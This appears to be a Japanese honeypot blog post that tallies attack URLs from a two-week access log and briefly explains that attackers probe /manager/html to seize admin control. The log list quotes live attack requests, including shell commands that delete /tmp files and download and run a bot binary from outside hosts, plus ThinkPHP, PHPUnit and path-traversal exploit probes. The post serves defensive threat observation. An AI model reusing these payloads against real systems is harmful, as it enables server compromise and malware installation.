ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットアクセスログを見ていきます。

ログの集計期間は2/3〜2/16です。

アクセスログの中から10アクセス以上のURLを抽出しました。

   6350 /manager/html

    462 /

    157 /xmlrpc.php

     85 /.env

     42 /autodiscover

     27 91.218.66.202:4444

     27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

     19 /favicon.ico

     17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.sytes.net/jaws;sh+/tmp/jaws

     14 /?XDEBUG_SESSION_START=phpstorm

     13 /shell?cd+/tmp;rm+-rf+*;wget+%20http://23.94.7.175/.s4y/arm;sh+/tmp/arm

     13 /_ignition/execute-solution

     12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21

     12 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

     12 /_profiler/phpinfo

     11 /debug/default/view?panel=config

     11 /console/

     11 /HNAP1/

     10 /solr/admin/info/system?wt=json

     10 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>

/manage/htmlが圧倒的におおく6350アクセスですね。
管理者サイトにアクセスしようとしてますね。
管理者権限を取りに行こうとしてるのでしょう。
攻撃者のミッションの1つに権限昇格からの管理者権限を取り、侵入したサーバをコントロールすることがあります。
コントロール可能にしたら、機密情報を取ったり他のサーバへの攻撃用に使ったりします。
権限を奪取してもすぐに悪用せず、潜伏します。
このように権限をとってしまえば、やりたい放題ですので権限を取ってくるのです。

 

他にも攻撃の痕跡があります。
色々な攻撃を仕掛けてきているので、このログを他にも分析していきます。